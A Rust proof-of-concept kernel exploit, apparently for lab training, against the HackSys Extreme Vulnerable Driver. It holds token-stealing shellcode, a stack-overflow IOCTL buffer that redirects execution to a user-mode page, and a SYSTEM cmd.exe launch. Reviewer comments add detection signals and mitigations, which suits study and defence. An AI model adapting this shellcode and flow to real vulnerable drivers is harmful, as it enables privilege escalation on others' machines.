- extern crate winapi;
- use winapi::um::fileapi::CreateFileA;
- use winapi::um::memoryapi::VirtualAlloc;
- use winapi::um::ioapiset::DeviceIoControl;
- use std::ptr::null_mut;
- use std::ffi::CString;
- use std::process::Command;
// Proof-of-concept client for the HackSys Extreme Vulnerable Driver (HEVD), a
// deliberately vulnerable training driver. Flow: open the device, stage a
// 58-byte payload in an executable user-mode page, send an over-long IOCTL
// input whose tail is that page's address, then start cmd.exe.
// NOTE(review): none of the Win32 return values below (handle, allocation,
// IOCTL result) is checked and the handle is never closed, so any failure is
// silent and later calls run on invalid values.
- fn main() {
// 58 bytes of 32-bit x86 machine code; cast to *mut u8 although it is only read.
// NOTE(review): this looks like the usual lab payload that copies the System
// process token into the current process. Its hard-coded structure offsets
// tie it to one Windows build -- confirm by disassembly.
- let shellcode = b"\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x31\xc0\x5d\xc2\x08\x00".as_ptr() as *mut u8;
// Extra level of indirection; dereferenced once in the copy below.
- let refshell = &shellcode;
// Opens the driver's device object. 0xC0000000 = GENERIC_READ | GENERIC_WRITE,
// 0x3 = OPEN_EXISTING. The CString temporary lives until the end of this
// statement, so the pointer stays valid for the duration of the call.
- let fd = unsafe {
- CreateFileA(CString::new("\\\\.\\HackSysExtremeVulnerableDriver").unwrap().as_ptr(), 0xC0000000, 0, null_mut(), 0x3, 0, null_mut())
- };
// 0x100 bytes; 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
// Detection: a private region that is writable and executable at once is a
// common endpoint-monitoring signal.
- let allc = unsafe {
- VirtualAlloc(null_mut(), 0x100, 0x3000, 0x40)
- };
// Copies the 58 payload bytes into the allocation. The block evaluates to (),
// so `_copying` carries no value. If VirtualAlloc returned null, this writes
// through a null pointer.
- let _copying = unsafe {
- (allc as *mut u8).copy_from(*refshell, 58);
- };
// Input buffer: 2080 filler bytes followed by the allocation address in
// little-endian form. usize is pointer-width, so the tail is 4 bytes on a
// 32-bit target and 8 bytes on a 64-bit one.
- let mut data = Vec::new();
- data.extend(std::iter::repeat(b'A').take(2080));
- let num = allc as usize;
- let bytes = num.to_le_bytes();
- data.extend_from_slice(&bytes);
- let input = data.as_ptr();
- let length = data.len() as u32;
- let mut lpbytes = 0;
// Sends `data` as the input buffer of IOCTL 0x222003, with no output buffer.
// NOTE(review): presumably the handler copies the input into a fixed-size
// kernel stack buffer without bounding the length, so the trailing address
// overwrites a saved return address -- confirm against the driver source.
// Driver-side fix: bound the copy by the destination size. Platform
// mitigation: SMEP blocks kernel-mode execution of user pages, which this
// flow depends on.
- let _contact = unsafe {
- DeviceIoControl(fd, 0x222003, input as *mut winapi::ctypes::c_void, length, null_mut(), 0, &mut lpbytes, null_mut())
- };
// Runs cmd.exe and waits for it; the child inherits this process's token.
// Detection: cmd.exe running as SYSTEM under an unprivileged, non-service
// parent process.
- Command::new("cmd.exe").status().expect("failed :/");
- }